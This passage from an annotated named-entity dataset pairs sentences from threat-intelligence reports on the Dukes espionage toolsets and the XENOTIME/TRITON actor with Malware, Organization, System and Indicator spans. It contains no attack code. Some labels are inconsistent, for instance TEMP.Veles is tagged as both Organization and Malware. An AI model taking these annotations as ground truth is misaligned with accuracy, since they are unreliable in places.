"Organization"}]} {"text": "While MiniDuke activity decreased significantly during the rest of 2013 following the attention it garnered from researchers , the beginning of 2014 saw the toolset back in full force .", "spans": [{"start": 6, "end": 14, "label": "Malware"}]} {"text": "All MiniDuke components , from the loader and downloader to the backdoor , had been slightly updated and modified during the downtime .", "spans": [{"start": 4, "end": 12, "label": "Malware"}]} {"text": "Interestingly , the nature of these modifications suggests that their primary purpose was to regain the element of stealth and undetectability that had been lost almost a year earlier .", "spans": []} {"text": "Of these modifications , arguably the most important were the ones done to the loader .", "spans": []} {"text": "These resulted in a loader version that would later become known as the \u201c Nemesis Gemina loader \u201d due to PDB strings found in many of the samples .", "spans": [{"start": 74, "end": 95, "label": "Malware"}, {"start": 105, "end": 108, "label": "System"}]} {"text": "It is however still only an iteration on earlier versions of the MiniDuke loader .", "spans": [{"start": 65, "end": 73, "label": "Malware"}]} {"text": "The first observed samples of the Nemesis Gemina loader ( compiled on 14th December 2013 ) were used to load the updated MiniDuke backdoor , but by the spring of 2014 the Nemesis Gemina loader was also observed in use with CosmicDuke .", "spans": [{"start": 34, "end": 55, "label": "Malware"}, {"start": 121, "end": 138, "label": "Malware"}, {"start": 171, "end": 192, "label": "Malware"}, {"start": 223, "end": 233, "label": "Malware"}]} {"text": "Following the MiniDuke expose , CosmicDuke in turn got its moment of fame when F-Secure published a whitepaper about it on 2nd July 2014 .", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 32, "end": 42, "label": "Malware"}, {"start": 79, "end": 87, "label": "Organization"}]} {"text": "The next 
day , Kaspersky also published their own research on the malware .", "spans": [{"start": 15, "end": 24, "label": "Organization"}]} {"text": "It should be noted that until this point , even though CosmicDuke had been in active use for over 4 years , and had undergone minor modifications and updates during that time , even the most recent CosmicDuke samples would often embed persistence components that date back to 2012 .", "spans": [{"start": 55, "end": 65, "label": "Malware"}, {"start": 198, "end": 208, "label": "Malware"}]} {"text": "These samples would also contain artefacts of functionality from the earliest CosmicDuke samples from 2010 .", "spans": [{"start": 78, "end": 88, "label": "Malware"}]} {"text": "It is therefore valuable to observe how the Dukes reacted to CosmicDuke \u2019s outing at the beginning of July .", "spans": [{"start": 61, "end": 71, "label": "Malware"}]} {"text": "By the end of that month , CosmicDuke samples we found that had been compiled on the 30th of July had shed unused parts of their code that had essentially just been relics of the past .", "spans": [{"start": 27, "end": 37, "label": "Malware"}]} {"text": "Similarly , some of the hardcoded values that had remained unaltered in CosmicDuke samples for many years had been changed .", "spans": [{"start": 72, "end": 82, "label": "Malware"}]} {"text": "We believe these edits were an attempt at evading detection by modifying or removing parts of the toolset that the authors believed might be helpful in identifying and detecting it .", "spans": []} {"text": "Concurrently with the alterations to CosmicDuke , the Dukes were also hard at work modifying their trusted loader .", "spans": [{"start": 37, "end": 47, "label": "Malware"}, {"start": 54, "end": 59, "label": "Organization"}]} {"text": "Much like the CosmicDuke toolset , the loader used by both MiniDuke and CosmicDuke had previously only undergone one major update ( the Nemesis Gemina upgrade ) since the first known samples from 2010 .", 
"spans": [{"start": 14, "end": 24, "label": "Malware"}, {"start": 59, "end": 67, "label": "Malware"}, {"start": 72, "end": 82, "label": "Malware"}, {"start": 136, "end": 150, "label": "Malware"}]} {"text": "Again , much of the modification work focused on removing redundant code in an attempt to appear different from earlier versions of the loader .", "spans": []} {"text": "Interestingly however , another apparent evasion trick was also attempted - forging of the loaders \u2019 compilation timestamps .", "spans": []} {"text": "The first CosmicDuke sample we observed after the initial research on CosmicDuke was a sample compiled on the 30th of July 2014 .", "spans": [{"start": 10, "end": 20, "label": "Malware"}, {"start": 70, "end": 80, "label": "Malware"}]} {"text": "The loader used by the sample purported to have been compiled on the 25th of March 2010 .", "spans": []} {"text": "Due to artefacts left in the loader during compilation time however , we know that it used a specific version of the Boost library , 1.54.0 , that was only published on the 1st of July 2013 .", "spans": [{"start": 117, "end": 122, "label": "System"}]} {"text": "The compilation timestamp therefore had to have been faked .", "spans": []} {"text": "F-Secure \u2019s whitepaper on CosmicDuke includes a timeline of the loader \u2019s usage , based on compilation timestamps .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 26, "end": 36, "label": "Malware"}]} {"text": "Perhaps the Dukes group thought that by faking a timestamp from before the earliest one cited in the whitepaper , they might be able to confuse researchers .", "spans": [{"start": 12, "end": 17, "label": "Organization"}]} {"text": "During the rest of 2014 and the spring of 2015 , the Dukes continued making similar evasionfocused modifications to CosmicDuke , as well as experimenting with ways to obfuscate the loader .", "spans": [{"start": 53, "end": 58, "label": "Organization"}, {"start": 116, "end": 126, 
"label": "Malware"}]} {"text": "In the latter case however , the group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": [{"start": 164, "end": 174, "label": "Malware"}]} {"text": "While it is not surprising that the Dukes reacted to multiple companies publishing extensive reports on one of their key toolsets , it is valuable to note the manner in which they responded .", "spans": [{"start": 36, "end": 41, "label": "Organization"}]} {"text": "Much like the MiniDuke expose in February 2013 , the Dukes again appeared to prioritize continuing operations over staying hidden .", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 53, "end": 58, "label": "Organization"}]} {"text": "They could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": [{"start": 34, "end": 44, "label": "Malware"}]} {"text": "Instead , they opted for minimal downtime and attempted to continue operations , with only minor modifications to the toolset .", "spans": []} {"text": "While we now know that CozyDuke had been under development since at least the end of 2011 , it was not until the early days of July 2014 that the first large-scale CozyDuke campaign that we are aware of took place .", "spans": [{"start": 23, "end": 31, "label": "Malware"}, {"start": 164, "end": 172, "label": "Malware"}]} {"text": "This campaign , like later CozyDuke campaigns , began with spear-phishing emails that tried to impersonate commonly seen spam emails .", "spans": [{"start": 27, "end": 35, "label": "Malware"}, {"start": 74, "end": 80, "label": "System"}, {"start": 126, "end": 132, "label": "System"}]} {"text": "These spear-phishing emails would contain links that eventually lead the victim to becoming infected with CozyDuke .", "spans": [{"start": 21, "end": 27, 
"label": "System"}, {"start": 106, "end": 114, "label": "Malware"}]} {"text": "Some of the CozyDuke spear-phishing emails from early July posed as e-fax arrival notifications , a popular theme for spam emails , and used the same \u201c US letter fax test page \u201d decoy document that was used a year later by CloudDuke .", "spans": [{"start": 12, "end": 20, "label": "Malware"}, {"start": 36, "end": 42, "label": "System"}, {"start": 68, "end": 73, "label": "System"}, {"start": 123, "end": 129, "label": "System"}, {"start": 162, "end": 165, "label": "System"}, {"start": 223, "end": 232, "label": "Malware"}]} {"text": "In at least one case however , the email instead contained a link to a zip archive file named \u201c Office Monkeys LOL Video.zip \u201d , which was hosted on the DropBox cloud storage service .", "spans": [{"start": 35, "end": 40, "label": "System"}, {"start": 71, "end": 74, "label": "System"}, {"start": 96, "end": 124, "label": "Indicator"}, {"start": 153, "end": 160, "label": "System"}]} {"text": "What made this particular case interesting was that instead of the usual dull PDF file , the decoy was a Flash video file , more specifically a Super Bowl advertisement from 2007 purporting to show monkeys at an office .", "spans": [{"start": 78, "end": 81, "label": "System"}, {"start": 105, "end": 110, "label": "System"}]} {"text": "THE DUKES 7 YEARS OF RUSSIAN CYBERESPIONAGE .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "Release_Time : 2015-09", "spans": []} {"text": "Report_URL : https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf", "spans": []} {"text": "2014 : OnionDuke gets caught using a malicious Tor node .", "spans": [{"start": 7, "end": 16, "label": "Malware"}, {"start": 47, "end": 50, "label": "System"}]} {"text": "On the 23rd of October 2014 , Leviathan Security Group published a blog post describing a malicious Tor exit node they had found .", "spans": [{"start": 30, 
"end": 54, "label": "Organization"}, {"start": 100, "end": 103, "label": "System"}]} {"text": "They noted that this node appeared to be maliciously modifying any executables that were downloaded through it over a HTTP connection .", "spans": [{"start": 118, "end": 122, "label": "Indicator"}]} {"text": "Executing the modified applications obtained this way would result in the victim being infected with unidentified malware .", "spans": []} {"text": "On the 14th of November , F-Secure published a blog post naming the malware OnionDuke and associating it with MiniDuke and CosmicDuke , the other Duke toolsets known at the time .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 76, "end": 85, "label": "Malware"}, {"start": 110, "end": 118, "label": "Malware"}, {"start": 123, "end": 133, "label": "Malware"}, {"start": 146, "end": 150, "label": "Organization"}]} {"text": "Based on our investigations into OnionDuke , we believe that for about 7 months , from April 2014 to when Leviathan published their blog post in October 2014 , the Tor exit node identified by the researchers was being used to wrap executables on-the-fly with OnionDuke ( image 7 , page 13 ) .", "spans": [{"start": 33, "end": 42, "label": "Malware"}, {"start": 106, "end": 115, "label": "Organization"}, {"start": 164, "end": 167, "label": "System"}, {"start": 259, "end": 268, "label": "Malware"}]} {"text": "This is similar to the way in which the toolset was being spread via trojanized applications in torrent files during the summer of 2013 .", "spans": []} {"text": "While investigating the OnionDuke variant being spread by the malicious Tor node , we also identified another OnionDuke variant that appeared to have successfully compromised multiple victims in the ministry of foreign affairs of an Eastern European country during the spring of 2014 .", "spans": [{"start": 24, "end": 33, "label": "Malware"}, {"start": 72, "end": 75, "label": "System"}, {"start": 110, "end": 119, "label": 
"Malware"}]} {"text": "This variant differed significantly in functionality from the one being spread via the Tor node , further suggesting that different OnionDuke variants are intended for different kinds of victims .", "spans": [{"start": 87, "end": 90, "label": "System"}, {"start": 132, "end": 141, "label": "Malware"}]} {"text": "We believe that , unusually , the purpose of the OnionDuke variant spread via the Tor node was not to pursue targeted attacks but instead to form a small botnet for later use .", "spans": [{"start": 49, "end": 58, "label": "Malware"}, {"start": 82, "end": 85, "label": "System"}]} {"text": "This OnionDuke variant is related to the one seen during the summer of 2013 being spread via torrent files .", "spans": [{"start": 5, "end": 14, "label": "Malware"}]} {"text": "Both of these infection vectors are highly indiscriminate and untargeted when compared to spearphishing , the usual infection vector of choice for the Dukes .", "spans": [{"start": 151, "end": 156, "label": "Organization"}]} {"text": "Further , the functionality of the OnionDuke variant is derived from a number of modules .", "spans": [{"start": 35, "end": 44, "label": "Malware"}]} {"text": "While one of these modules gathers system information and another attempts to steal the victim \u2019s usernames and passwords , as one would expect from a malware used for a targeted attack , the other two known OnionDuke modules are quite the opposite ; one is designed for use in DoS S-TOOL attacks and the other for posting predetermined messages to the Russian VKontakte social media site .", "spans": [{"start": 208, "end": 217, "label": "Malware"}, {"start": 361, "end": 370, "label": "System"}]} {"text": "This sort of functionality is more common in criminality-oriented botnets , not statesponsored targeted attacks .", "spans": []} {"text": "We have since been able to identify at least two separate OnionDuke botnets .", "spans": [{"start": 58, "end": 67, "label": "Malware"}]} {"text": 
"We believe the formation of the first of these botnets began in January 2014 , using both unidentified infection vectors and the known malicious Tor node , and continued until our blogpost was published in November .", "spans": [{"start": 145, "end": 148, "label": "System"}]} {"text": "We believe the formation of the second botnet began in August 2014 and continued until January 2015 .", "spans": []} {"text": "We have been unable to identify the infection vectors used for this second botnet , but the C&C servers it used had open directory listings , allowing us to retrieve files containing listings of victim IP addresses .", "spans": [{"start": 92, "end": 95, "label": "System"}]} {"text": "The geographic distribution of these IP addresses ( image 8 , page 13 ) further supports our theory that the purpose of this OnionDuke variant was not targeted attacks against high-profile targets .", "spans": [{"start": 125, "end": 134, "label": "Malware"}]} {"text": "One theory is that the botnets were a criminal side business for the Dukes group .", "spans": [{"start": 69, "end": 74, "label": "Organization"}]} {"text": "The size of the botnet however ( about 1400 bots ) is very small if its intended use is for commercial DoS attacks or spam-sending .", "spans": [{"start": 103, "end": 106, "label": "System"}]} {"text": "Alternatively , OnionDuke also steals user credentials from its victims , providing another potential revenue source .", "spans": [{"start": 16, "end": 25, "label": "Malware"}]} {"text": "The counter to that argument however is that the value of stolen credentials from users in the countries with the highest percentage of OnionDuke bots ( Mongolia and India ) are among the lowest on underground markets . 
2015 : The Dukes up the ante .", "spans": [{"start": 136, "end": 145, "label": "Malware"}, {"start": 231, "end": 236, "label": "Organization"}]} {"text": "The end of January 2015 saw the start of the most high- volume Duke campaign seen thus far , with thousands of recipients being sent spear-phishing emails that contained links to compromised websites hosting CozyDuke .", "spans": [{"start": 63, "end": 67, "label": "Organization"}, {"start": 148, "end": 154, "label": "System"}, {"start": 208, "end": 216, "label": "Malware"}]} {"text": "Curiously , the spear-phishing emails were strikingly similar to the e-fax themed spam usually seen spreading ransomware and other common crimeware .", "spans": [{"start": 31, "end": 37, "label": "System"}]} {"text": "Due to the sheer number of recipients , it may not have been possible to customize the emails in the same way as was possible with lower-volume campaigns .", "spans": [{"start": 87, "end": 93, "label": "System"}]} {"text": "The similarity to common spam may however also serve a more devious purpose .", "spans": []} {"text": "It is easy to imagine a security analyst , burdened by the amount of attacks against their network , dismissing such common-looking spam as \u201c just another crimeware spam run \u201d , allowing the campaign to , in essence , hide in the masses .", "spans": []} {"text": "The CozyDuke activity continues one of the long-running trends of the Dukes operations , the use of multiple malware toolsets against a single target .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 70, "end": 75, "label": "Organization"}]} {"text": "In this case , the Dukes first attempted to infect large numbers of potential targets with CozyDuke ( and in a more obvious manner than previously seen ) .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 91, "end": 99, "label": "Malware"}]} {"text": "They would then use the toolset to gather initial information on the victims , before 
deciding which ones to pursue further .", "spans": []} {"text": "For the victims deemed interesting enough , the Dukes would then deploy a different toolset .", "spans": [{"start": 48, "end": 53, "label": "Organization"}]} {"text": "We believe the primary purpose of this tactic is an attempt at evading detection in the targeted network .", "spans": []} {"text": "Even if the noisy initial CozyDuke campaign is noticed by the victim organization , or by someone else who then makes it publicly known , defenders will begin by first looking for indicators of compromise ( IOCs ) related to the CozyDuke toolset .", "spans": [{"start": 26, "end": 34, "label": "Malware"}, {"start": 180, "end": 204, "label": "System"}, {"start": 207, "end": 211, "label": "System"}, {"start": 229, "end": 237, "label": "Malware"}]} {"text": "If however by that time the Dukes are already operating within the victim \u2019s network , using an another toolset with different IOCs , then it is reasonable to assume that it will take much longer for the victim organization to notice the infiltration .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 127, "end": 131, "label": "System"}]} {"text": "In previous cases , the group used their malware toolsets interchangeably , as either the initial or a later-stage toolset in a campaign .", "spans": []} {"text": "For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke , that were purposely designed to leave a persistent backdoor on the compromised network .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 111, "end": 118, "label": "Malware"}, {"start": 123, "end": 133, "label": "Malware"}]} {"text": "HammerDuke is a set of backdoors that was first seen in the wild in February 2015 , while SeaDuke is a crossplatform backdoor that was , according to Symantec , first spotted in the wild in 
October 2014 .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 150, "end": 158, "label": "Organization"}]} {"text": "Both toolsets were originally spotted being deployed by CozyDuke to its victims .", "spans": [{"start": 56, "end": 64, "label": "Malware"}]} {"text": "What makes SeaDuke special is that it was written in Python and designed to work on both Windows and Linux systems ; it is the first cross-platform tool we have seen from the Dukes .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 53, "end": 59, "label": "System"}, {"start": 89, "end": 96, "label": "System"}, {"start": 101, "end": 106, "label": "System"}, {"start": 175, "end": 180, "label": "Organization"}]} {"text": "One plausible reason for developing such a flexible malware might be that the group were increasingly encountering victim environments where users were using Linux as their desktop operating system .", "spans": [{"start": 158, "end": 163, "label": "System"}]} {"text": "Meanwhile , HammerDuke is a Windows only malware ( written in .NET ) and comes in two variants .", "spans": [{"start": 12, "end": 22, "label": "Malware"}, {"start": 28, "end": 35, "label": "System"}, {"start": 62, "end": 66, "label": "System"}]} {"text": "The simpler one will connect to a hardcoded C&C server over HTTP or HTTPS to download commands to execute .", "spans": [{"start": 44, "end": 47, "label": "System"}, {"start": 60, "end": 64, "label": "Indicator"}, {"start": 68, "end": 73, "label": "Indicator"}]} {"text": "The more advanced variant , on the other hand , will use an algorithm to generate a periodically-changing Twitter account name and will then attempt to find tweets from that account containing links to the actual download location of the commands to execute .", "spans": [{"start": 106, "end": 113, "label": "System"}]} {"text": "In this way , the advanced HammerDuke variant attempts to hide its network traffic in more 
legitimate use of Twitter .", "spans": [{"start": 27, "end": 37, "label": "Malware"}, {"start": 109, "end": 116, "label": "System"}]} {"text": "This method is not unique to HammerDuke , as MiniDuke , OnionDuke , and CozyDuke all support similar use of Twitter ( image 9 , page 18 ) to retrieve links to additional payloads or commands . 2015 : CloudDuke .", "spans": [{"start": 29, "end": 39, "label": "Malware"}, {"start": 45, "end": 53, "label": "Malware"}, {"start": 56, "end": 65, "label": "Malware"}, {"start": 72, "end": 80, "label": "Malware"}, {"start": 108, "end": 115, "label": "System"}, {"start": 200, "end": 209, "label": "Malware"}]} {"text": "In the beginning of July 2015 , the Dukes embarked on yet another large-scale phishing campaign .", "spans": [{"start": 36, "end": 41, "label": "Organization"}]} {"text": "The malware toolset used for this campaign was the previously unseen CloudDuke and we believe that the July campaign marks the first time that this toolset was deployed by the Dukes , other than possible small-scale testing .", "spans": [{"start": 69, "end": 78, "label": "Malware"}, {"start": 176, "end": 181, "label": "Organization"}]} {"text": "The CloudDuke toolset consists of at least a loader , a downloader , and two backdoor variants .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 45, "end": 51, "label": "Malware"}, {"start": 56, "end": 66, "label": "Malware"}]} {"text": "Both backdoors ( internally referred to by their authors as \u201c BastionSolution \u201d and \u201c OneDriveSolution \u201d ) essentially allow the operator to remotely execute commands on the compromised machine .", "spans": [{"start": 62, "end": 77, "label": "Malware"}, {"start": 86, "end": 102, "label": "Malware"}]} {"text": "The way in which each backdoor does so however is significantly different .", "spans": []} {"text": "While the BastionSolution variant simply retrieves commands from a hard-coded C&C server controlled by the Dukes , the 
OneDriveSolution utilizes Microsoft \u2019s OneDrive cloud storage service for communicating with its masters , making it significantly harder for defenders to notice the traffic and block the communication channel .", "spans": [{"start": 10, "end": 25, "label": "Malware"}, {"start": 78, "end": 81, "label": "System"}, {"start": 107, "end": 112, "label": "Organization"}, {"start": 119, "end": 135, "label": "Malware"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 158, "end": 166, "label": "System"}]} {"text": "What is most significant about the July 2015 CloudDuke campaign is the timeline .", "spans": [{"start": 45, "end": 54, "label": "Malware"}]} {"text": "The campaign appeared to consist of two distinct waves of spear-phishing , one during the first days of July and the other starting from the 20th of the month .", "spans": []} {"text": "Details of the first wave , including a thorough technical analysis of CloudDuke , was published by Palo Alto Networks on 14th July .", "spans": [{"start": 71, "end": 80, "label": "Malware"}, {"start": 100, "end": 118, "label": "Organization"}]} {"text": "This was followed by additional details from Kaspersky in a blog post published on 16th July .", "spans": [{"start": 45, "end": 54, "label": "Organization"}]} {"text": "Both publications happened before the second wave took place and received notable publicity .", "spans": []} {"text": "Despite the attention and public exposure of the toolset \u2019s technical details ( including IOCs ) to defenders , the Dukes still continued with their second wave of spear-phishing , including the continued use of CloudDuke .", "spans": [{"start": 90, "end": 94, "label": "System"}, {"start": 116, "end": 121, "label": "Organization"}, {"start": 212, "end": 221, "label": "Malware"}]} {"text": "The group did change the contents of the spear-phishing emails they sent , but they didn\u2019t switch to a new email format ; instead , they reverted to the same efaxthemed format that 
they had previously employed , even to the point of reusing the exact same decoy document that they had used in the CozyDuke campaign a year earlier ( July 2014 ) .", "spans": [{"start": 56, "end": 62, "label": "System"}, {"start": 107, "end": 112, "label": "System"}, {"start": 297, "end": 305, "label": "Malware"}]} {"text": "This once more highlights two crucial behavioral elements of the Dukes group .", "spans": [{"start": 65, "end": 70, "label": "Organization"}]} {"text": "Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 62, "end": 72, "label": "Malware"}]} {"text": "Secondly , it underlines their boldness , arrogance and self-confidence ; they are clearly confident in both their ability to compromise their targets even when their tools and techniques are already publicly known , and critically , they appear to be extremely confident in their ability to act with impunity . 
2015 : Continuing surgical strikes with CosmicDuke .", "spans": [{"start": 352, "end": 362, "label": "Malware"}]} {"text": "In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke .", "spans": [{"start": 64, "end": 72, "label": "Malware"}, {"start": 77, "end": 86, "label": "Malware"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 166, "end": 176, "label": "Malware"}]} {"text": "The latest of these campaigns that we are aware of occurred during the spring and early summer of 2015 .", "spans": []} {"text": "As their infection vectors , these campaigns used malicious documents exploiting recently fixed vulnerabilities .", "spans": []} {"text": "Two of these campaigns were detailed in separate blog posts by the Polish security company Prevenity , who said that both campaigns targeted Polish entities with spear- phishing emails containing malicious attachments with relevant Polish language names .", "spans": [{"start": 91, "end": 100, "label": "Organization"}, {"start": 178, "end": 184, "label": "System"}]} {"text": "A third , similar , CosmicDuke campaign was observed presumably targeting Georgian entities since it used an attachment with a Georgian-language name that translates to \u201c NATO consolidates control of the Black Sea.docx \u201d .", "spans": [{"start": 20, "end": 30, "label": "Malware"}, {"start": 171, "end": 218, "label": "Indicator"}]} {"text": "Based on this , we do not believe that the Dukes are replacing their covert and targeted campaigns with the overt and opportunistic CozyDuke and CloudDuke style of campaigns .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 132, "end": 140, "label": "Malware"}, {"start": 145, "end": 154, "label": "Malware"}]} {"text": "Instead , we believe that they are simply expanding their activities by adding new tools and techniques .", "spans": []} {"text": "A 
XENOTIME to Remember : Veles in the Wild .", "spans": [{"start": 2, "end": 10, "label": "Organization"}, {"start": 25, "end": 30, "label": "System"}]} {"text": "FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \u201c TRITON actor \u201d when preparing to deploy the TRITON / TRISIS malware framework in 2017 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 104, "end": 110, "label": "Malware"}, {"start": 148, "end": 154, "label": "Malware"}, {"start": 157, "end": 163, "label": "Malware"}]} {"text": "Overall , the post does a commendable job in making public findings previously only privately shared ( presumably by FireEye , and in several reports I authored for my employer , Dragos ) to threat intelligence customers .", "spans": [{"start": 117, "end": 124, "label": "Organization"}, {"start": 179, "end": 185, "label": "Organization"}]} {"text": "As such , the blog continues to push forward the narrative of how ICS attacks are enabled through prepositioning and initial intrusion operations \u2013 an item I have discussed at length .", "spans": [{"start": 66, "end": 69, "label": "System"}]} {"text": "Yet one point of confusion in the blog comes at the very start : referring to the entity responsible for TRITON as the \u201c TRITON actor \u201d .", "spans": [{"start": 105, "end": 111, "label": "Malware"}, {"start": 121, "end": 127, "label": "Malware"}]} {"text": "This seems confusing as FireEye earlier publicly declared the \u201c TRITON actor \u201d as a discrete entity , linked to a Russian research institution , and christened it as \u201c TEMP.Veles \u201d .", "spans": [{"start": 24, "end": 31, "label": "Organization"}, {"start": 64, "end": 70, "label": "Malware"}, {"start": 168, "end": 178, "label": "Organization"}]} {"text": "In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON 
, with subsequent public presentations at Cyberwarcon and the Kaspersky Lab sponsored Security Analyst Summit essentially linking TRITON and the research institute ( and therefore TEMP.Veles ) as one in the same .", "spans": [{"start": 38, "end": 48, "label": "Organization"}, {"start": 51, "end": 58, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 160, "end": 166, "label": "Malware"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 297, "end": 303, "label": "Malware"}, {"start": 347, "end": 357, "label": "Malware"}]} {"text": "Yet the most-recent posting covering TTPs from initial access through prerequisites to enable final delivery of effects on target ( deploying TRITON / TRISIS ) avoids the use of the TEMP.Veles term entirely .", "spans": [{"start": 142, "end": 148, "label": "Malware"}, {"start": 151, "end": 157, "label": "Malware"}, {"start": 182, "end": 192, "label": "Organization"}]} {"text": "In subsequent discussion , FireEye personnel indicate that there was not \u201c an avalanche of evidence to substantiate \u201d anything more than \u201c TRITON actor \u201d \u2013 summing matters by indicating this term \u201c is the best we \u2019ve got for the public for now \u201d .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 139, "end": 145, "label": "Malware"}]} {"text": "Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors .", "spans": [{"start": 29, "end": 35, "label": "Organization"}]} {"text": "Utilizing Diamond Model methodology for characterizing activity by behaviors attached to victims , we began tracking TRITON / TRISIS and immediate enabling activity as a 
distinct activity group ( collection of behaviors , infrastructure , and victimology ) designated XENOTIME .", "spans": [{"start": 10, "end": 23, "label": "System"}, {"start": 117, "end": 123, "label": "Malware"}, {"start": 126, "end": 132, "label": "Malware"}, {"start": 268, "end": 276, "label": "Organization"}]} {"text": "Based on information gained from discussion with the initial TRITON / TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye \u2019s analysis published in April 2019 , described in various media .", "spans": [{"start": 61, "end": 67, "label": "Malware"}, {"start": 70, "end": 76, "label": "Malware"}, {"start": 147, "end": 153, "label": "Organization"}, {"start": 238, "end": 245, "label": "Organization"}]} {"text": "At this stage , we have two similar , parallel constructions of events \u2013 the how behind the immediate deployment and execution of TRITON / TRISIS \u2013 yet dramatically different responses in terms of attribution and labeling .", "spans": [{"start": 130, "end": 136, "label": "Malware"}, {"start": 139, "end": 145, "label": "Malware"}]} {"text": "Since late 2018 , based upon the most-recent posting , FireEye appears to have \u201c walked back \u201d the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \u201c TRITON actor \u201d , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": [{"start": 55, "end": 62, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}]} {"text": "Given that both organizations appear to describe similar ( if not identical ) activity , any reasonable person could ( and should ) ask \u2013 why the inconsistency in naming 
and identification .", "spans": []} {"text": "Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos \u2019 approaches with respect to the \u201c TRITON actor \u201d comes down to fundamental philosophical differences in methodology .", "spans": [{"start": 241, "end": 248, "label": "Organization"}, {"start": 253, "end": 259, "label": "Organization"}, {"start": 295, "end": 301, "label": "Malware"}]} {"text": "As wonderfully described in a recent public posting , FireEye adheres to a naming convention based upon extensive data collection and activity comparison , designed to yield the identification of a discrete , identifiable entity responsible for a given collection of activity .", "spans": [{"start": 54, "end": 61, "label": "Organization"}]} {"text": "This technique is precise and praiseworthy \u2013 yet at the same time , appears so rigorous as to impose limitations on the ability to dynamically adjust and adapt to emerging adversary activity . ( Or for that matter , even categorize otherwise well-known historical actors operating to the present day , such as Turla . 
) FireEye \u2019s methodology may have particular limitations in instances where adversaries ( such as XENOTIME and presumably TEMP.Veles ) rely upon extensive use of publicly-available , commonly-used tools with limited amounts of customization .", "spans": [{"start": 310, "end": 315, "label": "Organization"}, {"start": 320, "end": 327, "label": "Organization"}, {"start": 416, "end": 424, "label": "Organization"}, {"start": 440, "end": 450, "label": "Organization"}]} {"text": "In such cases , utilizing purely technical approaches for differentiation ( an issue I lightly touched on in a recent post ) becomes problematic , especially when trying to define attribution to specific , \u201c who-based \u201d entities ( such as a Russian research institute ) .", "spans": []} {"text": "My understanding is FireEye labels entities where definitive attribution is not yet possible with the \u201c TEMP \u201d moniker ( hence , TEMP.Veles ) \u2013 yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 129, "end": 139, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}]} {"text": "Based on the public blog post \u2013 which also indicated that FireEye is responding to an intrusion at a second facility featuring the same or similar observations \u2013 this is presumably not for lack of evidence , yet the \u201c downgrade \u201d occurs all the same .", "spans": [{"start": 58, "end": 65, "label": "Organization"}]} {"text": "In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": [{"start": 16, "end": 24, 
"label": "Organization"}]} {"text": "In personally responding to several incidents across multiple industry sectors since early 2018 matching TTPs from the TRITON / TRISIS event , these items proved consistent and supported the creation of the XENOTIME activity group .", "spans": [{"start": 119, "end": 125, "label": "Malware"}, {"start": 128, "end": 134, "label": "Malware"}, {"start": 207, "end": 215, "label": "Organization"}]} {"text": "This naming decision was founded upon the underlying methodology described in the Diamond Model of intrusion analysis .", "spans": [{"start": 82, "end": 95, "label": "System"}]} {"text": "As such , this decision does not necessarily refer to a specific institution , but rather a collection of observations and behaviors observed across multiple , similarly-situated victims .", "spans": []} {"text": "Of note , this methodology of naming abstracts away the \u201c who \u201d element \u2013 XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": [{"start": 74, "end": 82, "label": "Organization"}]} {"text": "Ultimately , the epistemic foundation of the behavior-based naming approach makes this irrelevant for tracking ( and labeling for convenience sake ) observations .", "spans": []} {"text": "Much like the observers watching the shadows of objects 